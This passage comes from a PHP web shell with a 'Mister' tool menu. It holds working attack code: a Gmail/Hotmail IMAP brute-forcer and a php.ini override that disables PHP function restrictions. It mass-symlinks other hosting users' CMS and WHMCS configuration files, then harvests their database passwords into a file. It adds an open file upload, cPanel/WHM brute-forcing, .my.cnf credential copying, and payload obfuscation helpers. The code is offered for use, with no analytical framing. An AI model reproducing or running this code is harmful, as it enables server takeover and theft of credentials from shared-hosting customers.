  1265. echo ''. $HOSTOWNED1 .'' ;
  1266. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1267.  
  1268.  
  1269. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1270. echo ''. $REPORTERROR .'</a></span></footer>';
  1271. echo ''. $THEEND .'<br>' ;
  1272. set_time_limit(0);
  1273. error_reporting(0);
  1274. class s1{
  1275. private $adres = array(
  1276. 'gmail' => '{imap.gmail.com:993/imap/ssl}',
  1277. 'hotmail' => '{pop3.live.com:995/pop3/ssl}'
  1278. );
  1279. private $imap;        
  1280. function __construct($gelen1,$gelen2){          
  1281. $uname     = explode("\r\n",$gelen1);    
  1282. $pwd     = explode("\r\n",$gelen2);    
  1283. foreach($pwd as $pass){
  1284. $pass = trim($pass);
  1285. foreach($uname as $user){
  1286. $user = trim($user);
  1287.                                  
  1288. if(preg_match('@gmail@si',$user)){
  1289. $this->baglan($this->adres["gmail"],$user,$pass);
  1290. }else{
  1291. $this->baglan($this->adres["hotmail"],$user,$pass);
  1292. }
  1293. }
  1294. }
  1295. }                
  1296. public function baglan($url,$user,$pass){            
  1297. $this->imap = imap_open($url,$user,$pass);
  1298. if($this->imap){
  1299. echo "<span color='#FFFFFF'>RESULT : </span><br> EMAILS : <span color='#FFFFFF'>$user </span> | PASSWORD :<span color='#FFFFFF'> $pass </span><br>";
  1300. }
  1301. }
  1302. function __destruct(){            
  1303. imap_close($this->imap);            
  1304. }
  1305. }        
  1306. echo '<table width="70%" border="0" cellspacing="0"></td><td>
  1307. <form id="form" method="POST" >
  1308. <textarea name="mail" rows="10" cols="5">LISTE EMAILS</textarea>  
  1309. <textarea name="sifre" rows="10" cols="5">PLISTE PASSWORD</textarea> <br /> <br />
  1310. <center><input type="submit" class="Mister-button" value="Brute !" /></center>
  1311. </form><br>
  1312. </div>
  1313. <div id="sonuc"> ';        
  1314. if($_POST){
  1315. $mails = $_POST["mail"];
  1316. $sifre = $_POST["sifre"];            
  1317. if((isset($mails)) and (isset($sifre))){    
  1318. $s1 = new s1($mails,$sifre);
  1319. }
  1320. }      
  1321. echo '</center></div> ';  
  1322. exit; }
  1323. //////////////// TOOLS
  1324. if ($_GET['Mister'] == 'cpanelBrut') {
  1325. echo "<center><nav class='social'><ul>
  1326. <li><a href='?Mister=cpanelBrut'>Turbo Cpanel Brut Force</a></li>
  1327. <li><a href='?Mister=Brutmailers'>Gmail & Hotmail Brute Force</a></li>
  1328. <li><a href='?Mister=AutoCp'>Auto Cpanel Finder/Cracker</a></li>
  1329. </ul></nav></center>";
  1330. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'> TURBO CPANEL BRUT FORCE
  1331. </span></nav><br><div class=content><center>";
  1332. ?>
  1333. <center><span style='color:#0078FF;font-size:18px;'>GET PHP.INI</span>
  1334. <form method=post>
  1335. <input type=submit name=ini value="GENERATE PHP.INI" class="Mister-button"/></form>
  1336. <?php
  1337. if(isset($_POST['ini']))
  1338. {
  1339. $r=fopen('php.ini','w');
  1340. $rr=" disable_functions=none ";
  1341. fwrite($r,$rr);
  1342. $link="<a target=_white href=php.ini><span class='input'>OPEN THIS LINK IN NEW TAB TO RUN PHP.INI</span></a>";
  1343. echo $link;
  1344.  
  1345. }
  1346. ?>
  1347. <p><span style='color:#0078FF;font-size:18px;'>SYMLINK BASED </span>
  1348. <form method=post>
  1349. <input type=submit name="usre" value="EXTRACT USERNAMES AND MASS SYMLINK" class="Mister-button"></form>
  1350. <?php
  1351. if(isset($_POST['usre'])){
  1352. ?><form method=post>
  1353. <textarea rows=10 cols=30 name=user class='input' style="height:200px;width:50%"><?php $users=file("/etc/passwd");
  1354. foreach($users as $user)
  1355. {
  1356. $str=explode(":",$user);
  1357. echo $str[0]."\n";
  1358. }
  1359. ?></textarea><br>
  1360. <input type=submit name=su value="START .HTACCESS"  class="Mister-button"></form><br><br>
  1361. <?php } ?>
  1362. <?php
  1363. error_reporting(0);
  1364. if(isset($_POST['su']))
  1365. {
  1366. $DIR=mkDIR('MKcpanel',0777);
  1367. $r = " Options all \n DIRectoryIndex MKcpanel.html \n Require None \n Satisfy Any";
  1368. $f = fopen('MKcpanel/.htaccess','w');
  1369.  
  1370. fwrite($f,$r);
  1371. $consym="<a href=MKcpanel/><span style='color:#0078FF'>GET FILES</font></a>";
  1372. echo "<br><span style='color:white'>FOLDER WHERE CONFIG FILES HAS BEEN SYMLINKED .../MKCPANEL/...<br><span style=color:#0078FF''>$consym</span>";
  1373.  
  1374. $usr=explode("\n",$_POST['user']);
  1375.  
  1376. foreach($usr as $uss )
  1377. {
  1378. $us=trim($uss);
  1379.  
  1380. $r="MKcpanel/";
  1381. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  1382. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  1383. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  1384. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  1385. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  1386. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  1387. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  1388. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  1389. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  1390. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  1391. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  1392. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  1393. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  1394. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  1395. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  1396. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  1397. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  1398. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  1399. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  1400. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  1401. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  1402. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  1403. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  1404. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  1405. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  1406. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  1407. }
  1408. }
  1409. ?>
  1410. <p><span style='color:#0078FF;font-size:18px;'>PASSWORD GRABING SECTION</span>
  1411. <form method=post>
  1412. <input type=submit name=sm value="GRABBING PASSWORDS FROM CONFIGURATION FILES" class="Mister-button"></form>
  1413. <?php
  1414. error_reporting(0);
  1415. set_time_limit(0);
  1416. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  1417. {
  1418.  
  1419. $ar0=explode($marqueurDebutLien, $text);
  1420. $ar1=explode($marqueurFinLien, $ar0[1]);
  1421. $ar=trim($ar1[0]);
  1422. return $ar;
  1423. }
  1424.  
  1425. if(isset($_POST['sm']))
  1426.  
  1427. {
  1428. echo "<span style='color:white'>U CAN COPY AND PAST /ETC/PASSWD</span><br>";
  1429. $ffile=fopen('r.txt','a+');
  1430.  
  1431.  
  1432. $r= 'http://'.$_SERVER['SERVER_NAME'].DIRname($_SERVER['SCRIPT_NAME'])."/MKcpanel/";
  1433. $re=$r;
  1434. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  1435.  
  1436. $users=file("/etc/passwd");
  1437. foreach($users as $user)
  1438. {
  1439.  
  1440. $str=explode(":",$user);
  1441. $usersss=$str[0];
  1442. foreach($confi as $co)
  1443. {
  1444.  
  1445.  
  1446. $uurl=$re.$usersss.$co;
  1447. $uel=$uurl;
  1448.  
  1449. $ch = curl_init();
  1450.  
  1451. curl_setopt($ch, CURLOPT_URL, $uel);
  1452. curl_setopt($ch, CURLOPT_HEADER, 1);
  1453. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1454. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1455. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  1456. $result['EXE'] = curl_exec($ch);
  1457. curl_close($ch);
  1458. $uxl=$result['EXE'];
  1459.  
  1460.  
  1461. if($uxl && preg_match('/table_prefix/i',$uxl))
  1462. {
  1463.  
  1464. echo "<div align=center><table width=60% ><tr><td align=center> <span> $usersss  </span><span style='color:#0078FF'>USER'S WEBSITE CMS IS WORDPRESS </span></td></tr></table>";
  1465.  
  1466.  echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  1467. if(!empty($dbp))
  1468. $pass=$dbp."\n";
  1469. fwrite($ffile,$pass);
  1470.  
  1471. }
  1472. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  1473. {
  1474.  
  1475. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss  </span> <span style='color:#0078FF'>USER'S WEBSITE WHMCS </span></td></tr></table>";
  1476.  
  1477. echo $dbp=entre2v2($uxl,"db_password = '","';");
  1478. if(!empty($dbp))
  1479. $pass=$dbp."\n";
  1480. fwrite($ffile,$pass);
  1481.  
  1482. }
  1483.  
  1484.  
  1485. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  1486. {
  1487.  
  1488. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss  </span> <span style='color:#0078FF'>USER'S  WEBSITE CMS IS JOOMLA </span></td></tr></table>";
  1489.  
  1490. echo $db=entre2v2($uxl,"password = '","';");
  1491. if(!empty($db))
  1492. $pass=$db."\n";
  1493. fwrite($ffile,$pass);
  1494. }
  1495. elseif($uxl && preg_match('/admincpDIR/i',$uxl))
  1496. {
  1497.  
  1498. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss  </span> <span style='color:#0078FF'>USER'S WEBSITE CMS IS VBULLETIN </span></td></tr></table>";
  1499.  
  1500. echo $db=entre2v2($uxl,"password'] = '","';");
  1501. if(!empty($db))
  1502. $pass=$db."\n";
  1503. fwrite($ffile,$pass);
  1504.  
  1505. }
  1506. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  1507. {
  1508.  
  1509. echo "<div align=center><table width=60% ><tr><td align=center><span style='color:#0078FF'> GOT CONFIG FILE FOR UNKNWON CMS FOR USER</span><span> $usersss  </span></td></tr></table>";
  1510.  
  1511. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  1512. if(!empty($db))
  1513. $pass=$db."\n";
  1514. fwrite($ffile,$pass);
  1515. }
  1516. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1517. {
  1518.  
  1519. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss </span> user's config file for unknwon cms </span></td></tr></table>";
  1520.  
  1521. echo $db=entre2v2($uxl,"dbpass = '","';");
  1522. if(!empty($db))
  1523. $pass=$db."\n";
  1524. fwrite($ffile,$pass);
  1525. }
  1526. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1527. {
  1528.  
  1529. echo "<div align=center><table width=60% ><tr><td align=center><span style='color:#0078FF'>  GOT CONFIG FILE FOR UNKNWON CMS OF USER </span><span>$usersss  </span></td></tr></table>";
  1530.  
  1531. echo $db=entre2v2($uxl,"dbpass = '","';");
  1532. if(!empty($db))
  1533. $pass=$db."\n";
  1534. fwrite($ffile,$pass);
  1535.  
  1536. }
  1537. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1538. {
  1539.  
  1540. echo "<div align=center><table width=60% ><tr><td align=center><span>  $usersss </span> <span style='color:#0078FF'> USER'S CONFIG FILE FOR UNKNWON CMS </span></td></tr></table>";
  1541.  
  1542. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  1543. if(!empty($db))
  1544. $pass=$db."\n";
  1545. fwrite($ffile,$pass);
  1546. }
  1547. }
  1548. }
  1549. }
  1550. $data  = $_GET['data'];
  1551. if($data == 'data'){
  1552.  
  1553. $filename = $_FILES['file']['name'];
  1554. $filetmp  = $_FILES['file']['tmp_name'];
  1555.  
  1556. echo "<form method='POST' enctype='multipart/form-data'>
  1557.     <input type='file'name='file'>
  1558.     <input type='submit' value='data' class='Mister-button'>
  1559. </form>";
  1560. MOVE_UPLOADED_FILE($filetmp,$filename);
  1561. }
  1562. ?>
  1563. <span style='color:#0078FF;font-size:18px;'>CPANEL CRACKER</span>
  1564. <form method=post>
  1565. <input type=submit name=cpanel value="AUTO USERNAME/PASSWORD LOADING CPANEL CRACKER" class="Mister-button"><p><?php if(isset($_POST['cpanel'])){?>
  1566. <form method=post><div align=center><table>
  1567. <span>WANT TO BRUTE <select name="op" class="input"> <option name="op" value="cp">CPANEL</option>
  1568. <option name="op" value="whm">WHMPANEL</option></table><p>
  1569. <td class="Mister-Tabl"><textarea class="input" style="width:50%;height:200px;" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  1570. foreach($users as $user)
  1571. {
  1572. $str=explode(":",$user);
  1573. echo $str[0]."\n";
  1574. }
  1575. ?></textarea></td><td class="Mister-Tabl"><textarea class="input" style="width:50%;height:200px;" rows=20 cols=25 name=passwords >
  1576. <?php
  1577.  
  1578. $d=getcwd()."/r.txt";
  1579. $pf=file($d);
  1580. foreach($pf as $rt)
  1581. {
  1582. $str=explode('\n',$rt);
  1583. echo trim($str[0])."\n";
  1584. } ?></textarea></td><p>
  1585. <input type=submit name=cpanelcracking value="START"  class="Mister-button"></form><br><br>
  1586. <?php
  1587. }
  1588. ?>
  1589. <?php
  1590. error_reporting(0);
  1591. $connect_timeout=5;
  1592. set_time_limit(0);
  1593.  
  1594. $userl=$_POST['usernames'];
  1595. $passl=$_POST['passwords'];
  1596. $attack=$_POST['op'];
  1597. $target = "localhost";
  1598.  
  1599. if(isset($_POST['cpanelcracking']))
  1600. {
  1601. if($userl!=="" && $passl!=="")
  1602. {
  1603. if($_POST["op"]=="cp")
  1604. {
  1605. $cracked=$_POST['crack'];
  1606. @fopen($cracked,'a');
  1607. echo "<br><span>......NOW WE ARE ATTACKING CPANELS....PLEASE WAIT TILL THE END OF PROCESS </span>\n";
  1608.  
  1609.  
  1610. }
  1611. elseif($_POST["op"]=="whm")
  1612. {
  1613. @fopen($cracked,'a');
  1614. echo "<br><span>......NOW WE ARE ATTACKING WHM PANEL....PLEASE WAIT TILL THE END OF PROCESS</span>";
  1615.  
  1616. }
  1617.  
  1618. function cpanel($host,$user,$pass,$timeout){
  1619. $ch = curl_init();
  1620. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  1621. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1622. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1623. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1624. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1625. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1626. $data = curl_exec($ch);
  1627. if ( curl_errno($ch) == 0 ){
  1628. echo "<table width=100% ><tr><td align=center><font color=#FFFFFF >==================================</font><font color=red > $user </font><font color=#FFFFFF >cracked with </font><font color=red > $pass </font> <font color=#FFFFFF >==================================</font></b></td></tr></table>";
  1629. }
  1630. curl_close($ch);}
  1631.  
  1632. $userlist=explode("\n",$userl);
  1633. $passlist=explode("\n",$passl);
  1634.  
  1635. if ($attack == "cp")
  1636. {
  1637. foreach ($userlist as $user) {
  1638. echo "<div align=center><table width=80% ><tr><td align=center><font color=red size=1>Attacking user $user </font></td></tr></table>";
  1639. $finaluser = trim($user);
  1640. foreach ($passlist as $password ) {
  1641. $finalpass = trim($password);
  1642. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  1643. }
  1644. }
  1645. }
  1646. function whm($host,$user,$pass,$timeout){
  1647. $ch = curl_init();
  1648. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  1649. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1650. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1651. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1652. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1653. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1654. $data = curl_exec($ch);
  1655. if ( curl_errno($ch) == 0 ){
  1656. echo "<table width=100% ><tr><td align=center><font color=#FFFFFF >==================================</font><font color=red > $user </font><font color=#FFFFFF >cracked with </font><font color=red > $pass </font> <font color=#FFFFFF >==================================</font></b></td></tr></table>";
  1657. }
  1658. curl_close($ch);}
  1659. $userlist=explode("\n",$userl);
  1660. $passlist=explode("\n",$passl);
  1661.  
  1662. if ($attack == "whm")
  1663. {
  1664. foreach ($userlist as $user) {
  1665. echo "<table width=80% ><tr><td align=center><span style='color:#0078FF'>USER UNDER ATTACK IS $user </span></td></tr></table>";
  1666. $finaluser = trim($user);
  1667. foreach ($passlist as $password ) {
  1668. $finalpass = trim($password);
  1669.  
  1670. whm($target,$finaluser,$finalpass,$connect_timeout);
  1671. }
  1672. }
  1673. }
  1674. }
  1675. elseif($userl=="")
  1676. {
  1677. echo "<span style='color:red'>USERLIST FIELD </span><br>";
  1678. }
  1679. elseif($passl=="")
  1680. {
  1681.  
  1682. echo "<span style='color:#0078FF'>PLEASE PUT PASSWORDS IN PAASWORD LIST FIELD</span><br>";
  1683. }
  1684. }
  1685. $data  = $_GET['data'];
  1686. if($data == 'data'){
  1687. $filename = $_FILES['file']['name'];
  1688. $filetmp  = $_FILES['file']['tmp_name'];
  1689.  
  1690. echo "<form method='POST' enctype='multipart/form-data'>
  1691.     <input type='file'name='file' />
  1692.     <input type='submit' value='DATA' class='Mister-button'>
  1693. </form>";
  1694. MOVE_UPLOADED_FILE($filetmp,$filename);
  1695. }
  1696. //////// FOOTER
  1697. $FOTTER2 = "<footer class='MK-footer'>";  
  1698. echo ''. $FOTTER2 .'' ;
  1699. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1700. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1701. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1702. $SERVERIP1 = "SERVER IP :";
  1703. echo ''. $SERVERIP1 .'' ;
  1704. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1705. $SPAN3 = "</span>";
  1706. echo ''. $SPAN2 .'' ;
  1707. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1708. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1709. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1710. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1711. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1712. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1713. $HOSTOWNED1 = "HOST OWNED :";
  1714. echo ''. $HOSTOWNED1 .'' ;
  1715. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1716. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1717. echo ''. $REPORTERROR .'</a></span></footer>';
  1718. echo ''. $THEEND .'' ;
  1719. exit;
  1720. }
  1721. ///////// CPANNELS
  1722. if ($_GET["Mister"] == "AutoCp"){
  1723.     echo "<br><center><nav class='social'><ul>
  1724. <li><a href='?Mister=cpanelBrut'>Turbo Cpanel Brut Force</a></li>
  1725. <li><a href='?Mister=Brutmailers'>Gmail & Hotmail Brute Force</a></li>
  1726. <li><a href='?Mister=AutoCp'>Auto Cpanel Finder/Cracker</a></li>
  1727. </ul></nav></center>";
  1728. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>AUTO CPANEL FINDER/CRACKER</span></nav><br><div class=content><center>";
  1729. @ini_set('display_errors',0);
  1730. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1731.     $ar0=explode($marqueurDebutLien, $text);
  1732.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  1733.     return trim($ar1[0]);
  1734. }
  1735.  
  1736. echo "<center>";
  1737. $d0mains = @file('/etc/named.conf');
  1738. $domains = scandir("/var/named");
  1739.  
  1740. if ($domains or $d0mains)
  1741. {
  1742.     $domains = scandir("/var/named");
  1743.     if($domains) {
  1744. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1745. $count=1;
  1746. $dc = 0;
  1747. $list = scandir("/var/named");
  1748. foreach($list as $domain){
  1749. if(strpos($domain,".db")){
  1750. $domain = str_replace('.db','',$domain);
  1751. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1752. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1753. $path = getcwd();
  1754.  
  1755. if (is_readable($dirz)) {
  1756. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1757. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1758. $password=entre2v2($p,'password="','"');
  1759. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  1760. $dc++;
  1761. }
  1762.  
  1763. }
  1764. }
  1765. echo '</table>';
  1766. $total = $dc;
  1767. echo '<br><div class="result">TOTAL CPANEL FOUND = '.$total.'</h3><br />';
  1768. echo '</center>';
  1769. }else{
  1770. $d0mains = @file('/etc/named.conf');
  1771.     if($d0mains) {
  1772. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1773. $count=1;
  1774. $dc = 0;
  1775. $mck = array();
  1776. foreach($d0mains as $d0main){
  1777.     if(@eregi('zone',$d0main)){
  1778.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1779.         flush();
  1780.         if(strlen(trim($domain[1][0])) >2){
  1781.             $mck[] = $domain[1][0];
  1782.         }
  1783.     }
  1784. }
  1785. $mck = array_unique($mck);
  1786. $usr = array();
  1787. $dmn = array();
  1788. foreach($mck as $o) {
  1789.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1790.     $usr[] = $infos['name'];
  1791.     $dmn[] = $o;
  1792. }
  1793. array_multisort($usr,$dmn);
  1794. $dt = file('/etc/passwd');
  1795. $passwd = array();
  1796. foreach($dt as $d) {
  1797.     $r = explode(':',$d);
  1798.     if(strpos($r[5],'home')) {
  1799.         $passwd[$r[0]] = $r[5];
  1800.     }
  1801. }
  1802. $l=0;
  1803. $j=1;
  1804. foreach($usr as $r) {
  1805. $dirz = '/home/'.$r.'/.my.cnf';
  1806. $path = getcwd();
  1807. if (is_readable($dirz)) {
  1808. copy($dirz, ''.$path.'/'.$r.'.txt');
  1809. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1810. $password=entre2v2($p,'password="','"');
  1811. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1812. $dc++;
  1813.                 flush();
  1814.                 $l=$l?0:1;
  1815.                 $j++;
  1816.                 }
  1817.             }
  1818.             }
  1819. echo '</table>';
  1820. $total = $dc;
  1821. echo '<br><div class="result">TOTAL CPANEL FOUND = '.$total.'</h3><br />';
  1822. echo '</center>';
  1823.  
  1824. }
  1825. }else{
  1826. echo "<div class='result'><font color='#FF0000'>ERROR</font><br><font color='white'>/var/named</font> or <font color='white'>etc/named.conf</font><font color='red'> Not Accessible!</font></div>";
  1827. }
  1828. //////// FOOTER
  1829. $FOTTER2 = "<footer class='MK-footer'>";  
  1830. echo ''. $FOTTER2 .'' ;
  1831. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1832. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1833. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1834. $SERVERIP1 = "SERVER IP :";
  1835. echo ''. $SERVERIP1 .'' ;
  1836. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1837. $SPAN3 = "</span>";
  1838. echo ''. $SPAN2 .'' ;
  1839. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1840. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1841. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1842. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1843. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1844. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1845. $HOSTOWNED1 = "HOST OWNED :";
  1846. echo ''. $HOSTOWNED1 .'' ;
  1847. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1848. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1849. echo ''. $REPORTERROR .'</a></span></footer>';
  1850. echo ''. $THEEND .'' ;
  1851.  
  1852. exit ; }
  1853. ///////////// BASE64CRY
  1854. if ($_GET["Mister"] == "Base64Cry"){
  1855. echo '<br><center><nav class="social"><ul>
  1856. <li><a href="?Mister=string">Encoder</a></li>
  1857. <li><a href="?Mister=Base64Cry">Base64 Decrypt V2.0</a></li>
  1858. <li><a href="?Mister=obfuscate">Php Obfuscate</a></li>
  1859. <li><a href="?Mister=HashId">Hash Identification</a></li>
  1860. </ul></nav></center>';
  1861. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>BASE64 CRYPT & DECRYPT V2.0</span></nav><br><div class=content><center>";
  1862. {$text = $_POST['code'];
  1863. echo' <form method="post"><textarea cols=80 rows=9 name="code" class="input" style="height:100px; width:50%;">
  1864. </textarea><br><br>
  1865. <select  name="ope">
  1866. <option value="base64">BASE64</option ><option value="gzinflate"> STR_ROT13 - GZINFLATE - BASE64 </option>
  1867. <option value="str">STR_ROT13 - GZINFLATE - STR_ROT13 - BASE64</option > < /select>
  1868. <input class="Mister-button" type="submit" name="submit" value="ENCRYPT">
  1869. <input class="Mister-button" type="submit" name="submits" value="DECRYPT">
  1870. </form > ';
  1871.     $submit = $_POST['submit'];
  1872.     if (isset($submit)) {
  1873.         $op = $_POST["ope"];
  1874.         switch ($op) {
  1875.         case 'base64':
  1876.             $codi = base64_encode($text);
  1877.             break;
  1878.         case 'str':
  1879.             $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1880.             break;
  1881.         case 'gzinflate':
  1882.             $codi = base64_encode(gzdeflate(str_rot13($text)));
  1883.             break;
  1884.         default:
  1885.             break;
  1886.         }
  1887.     }
  1888.  
  1889.     $submit = $_POST['submits'];
  1890.     if (isset($submit)) {
  1891.         $op = $_POST["ope"];
  1892.         switch ($op) {
  1893.         case 'base64':
  1894.             $codi = base64_decode($text);
  1895.             break;
  1896.         case 'str':
  1897.             $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  1898.             break;
  1899.         case 'gzinflate':
  1900.             $codi = str_rot13(gzinflate(base64_decode($text)));
  1901.             break;
  1902.         default:
  1903.             break;
  1904.         }
  1905.     }
  1906. echo '<textarea cols=80 rows=9 class="input" style="height:150px; width:50%;" readonly>'.$codi.'</textarea></center>'; }
  1907. ///// FOOTER
  1908. $FOTTER2 = "<footer class='MK-footer'>";  
  1909. echo ''. $FOTTER2 .'' ;
  1910. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1911. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
